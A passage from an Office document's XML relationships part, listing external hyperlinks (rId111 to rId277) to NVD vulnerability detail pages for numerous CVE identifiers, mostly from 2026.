TargetMode="External" Id="rId111" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53713" TargetMode="External" Id="rId112" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61594" TargetMode="External" Id="rId113" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67593" TargetMode="External" Id="rId114" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75156" TargetMode="External" Id="rId115" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75513" TargetMode="External" Id="rId116" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77408" TargetMode="External" Id="rId117" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78299" TargetMode="External" Id="rId118" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80424" TargetMode="External" Id="rId119" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81642" TargetMode="External" Id="rId120" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84625" TargetMode="External" Id="rId121" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85597" TargetMode="External" Id="rId122" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86881" TargetMode="External" Id="rId123" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89779" TargetMode="External" Id="rId124" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89786" TargetMode="External" Id="rId125" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89846" TargetMode="External" Id="rId126" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90011" TargetMode="External" Id="rId127" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92395" TargetMode="External" Id="rId128" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92717" TargetMode="External" Id="rId129" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92720" TargetMode="External" Id="rId130" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76420" TargetMode="External" Id="rId131" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73455" TargetMode="External" Id="rId132" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77403" TargetMode="External" Id="rId133" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77410" TargetMode="External" Id="rId134" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77412" TargetMode="External" Id="rId135" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-8462" TargetMode="External" Id="rId136" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2023-46273" TargetMode="External" Id="rId137" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-13293" TargetMode="External" Id="rId138" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16428" TargetMode="External" Id="rId139" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16466" TargetMode="External" Id="rId140" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16673" TargetMode="External" Id="rId141" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20333" TargetMode="External" Id="rId142" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20336" TargetMode="External" Id="rId143" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20340" TargetMode="External" Id="rId144" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20344" TargetMode="External" Id="rId145" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20360" TargetMode="External" Id="rId146" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20361" TargetMode="External" Id="rId147" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-27547" TargetMode="External" Id="rId148" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-27548" TargetMode="External" Id="rId149" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-27549" TargetMode="External" Id="rId150" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-27550" TargetMode="External" Id="rId151" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-27551" TargetMode="External" Id="rId152" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-27554" TargetMode="External" Id="rId153" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-27555" TargetMode="External" Id="rId154" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-27556" TargetMode="External" Id="rId155" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-27558" TargetMode="External" Id="rId156" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-27559" TargetMode="External" Id="rId157" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-43686" TargetMode="External" Id="rId158" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-43815" TargetMode="External" Id="rId159" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47094" TargetMode="External" Id="rId160" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55416" TargetMode="External" Id="rId161" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61599" TargetMode="External" Id="rId162" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62706" TargetMode="External" Id="rId163" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63506" TargetMode="External" Id="rId164" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-65374" TargetMode="External" Id="rId165" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-65390" TargetMode="External" Id="rId166" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-65391" TargetMode="External" Id="rId167" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66814" TargetMode="External" Id="rId168" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66818" TargetMode="External" Id="rId169" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66819" TargetMode="External" Id="rId170" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66820" TargetMode="External" Id="rId171" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67370" TargetMode="External" Id="rId172" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67373" TargetMode="External" Id="rId173" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67380" TargetMode="External" Id="rId174" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67381" TargetMode="External" Id="rId175" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67384" TargetMode="External" Id="rId176" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67385" TargetMode="External" Id="rId177" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67388" TargetMode="External" Id="rId178" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69860" TargetMode="External" Id="rId179" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70203" TargetMode="External" Id="rId180" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71336" TargetMode="External" Id="rId181" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73173" TargetMode="External" Id="rId182" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75624" TargetMode="External" Id="rId183" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76059" TargetMode="External" Id="rId184" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76409" TargetMode="External" Id="rId185" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77495" TargetMode="External" Id="rId186" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78088" TargetMode="External" Id="rId187" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78569" TargetMode="External" Id="rId188" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78571" TargetMode="External" Id="rId189" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78575" TargetMode="External" Id="rId190" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79742" TargetMode="External" Id="rId191" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81048" TargetMode="External" Id="rId192" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81211" TargetMode="External" Id="rId193" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81550" TargetMode="External" Id="rId194" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81940" TargetMode="External" Id="rId195" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81941" TargetMode="External" Id="rId196" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82095" TargetMode="External" Id="rId197" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82097" TargetMode="External" Id="rId198" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82098" TargetMode="External" Id="rId199" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82099" TargetMode="External" Id="rId200" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82964" TargetMode="External" Id="rId201" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83941" TargetMode="External" Id="rId202" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84858" TargetMode="External" Id="rId203" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84860" TargetMode="External" Id="rId204" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85168" TargetMode="External" Id="rId205" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85731" TargetMode="External" Id="rId206" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86865" TargetMode="External" Id="rId207" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87105" TargetMode="External" Id="rId208" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88064" TargetMode="External" Id="rId209" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89084" TargetMode="External" Id="rId210" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89774" TargetMode="External" Id="rId211" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89777" TargetMode="External" Id="rId212" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89804" TargetMode="External" Id="rId213" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89811" TargetMode="External" Id="rId214" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89844" TargetMode="External" Id="rId215" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89849" TargetMode="External" Id="rId216" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89860" TargetMode="External" Id="rId217" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89898" TargetMode="External" Id="rId218" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89907" TargetMode="External" Id="rId219" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89908" TargetMode="External" Id="rId220" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89913" TargetMode="External" Id="rId221" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89928" TargetMode="External" Id="rId222" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89929" TargetMode="External" Id="rId223" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89932" TargetMode="External" Id="rId224" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89951" TargetMode="External" Id="rId225" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89957" TargetMode="External" Id="rId226" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89959" TargetMode="External" Id="rId227" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89960" TargetMode="External" Id="rId228" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89995" TargetMode="External" Id="rId229" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90000" TargetMode="External" Id="rId230" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90018" TargetMode="External" Id="rId231" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90041" TargetMode="External" Id="rId232" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92122" TargetMode="External" Id="rId233" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92123" TargetMode="External" Id="rId234" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92124" TargetMode="External" Id="rId235" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92125" TargetMode="External" Id="rId236" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92137" TargetMode="External" Id="rId237" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92466" TargetMode="External" Id="rId238" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92566" TargetMode="External" Id="rId239" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92580" TargetMode="External" Id="rId240" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92592" TargetMode="External" Id="rId241" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92593" TargetMode="External" Id="rId242" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92748" TargetMode="External" Id="rId243" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92761" TargetMode="External" Id="rId244" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92762" TargetMode="External" Id="rId245" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92780" TargetMode="External" Id="rId246" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92788" TargetMode="External" Id="rId247" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92796" TargetMode="External" Id="rId248" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92801" TargetMode="External" Id="rId249" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2024-39896" TargetMode="External" Id="rId250" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-40854" TargetMode="External" Id="rId251" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-59879" TargetMode="External" Id="rId252" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73174" TargetMode="External" Id="rId253" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73464" TargetMode="External" Id="rId254" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75516" TargetMode="External" Id="rId255" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77404" TargetMode="External" Id="rId256" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82028" TargetMode="External" Id="rId257" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82064" TargetMode="External" Id="rId258" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82075" TargetMode="External" Id="rId259" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82410" TargetMode="External" Id="rId260" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82762" TargetMode="External" Id="rId261" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82766" TargetMode="External" Id="rId262" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82770" TargetMode="External" Id="rId263" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82772" TargetMode="External" Id="rId264" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82774" TargetMode="External" Id="rId265" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82777" TargetMode="External" Id="rId266" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82779" TargetMode="External" Id="rId267" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82780" TargetMode="External" Id="rId268" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82787" TargetMode="External" Id="rId269" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82789" TargetMode="External" Id="rId270" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82791" TargetMode="External" Id="rId271" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82794" TargetMode="External" Id="rId272" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84408" TargetMode="External" Id="rId273" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85617" TargetMode="External" Id="rId274" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86106" TargetMode="External" Id="rId275" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86831" TargetMode="External" Id="rId276" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87817" TargetMode="External" Id="rId277" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 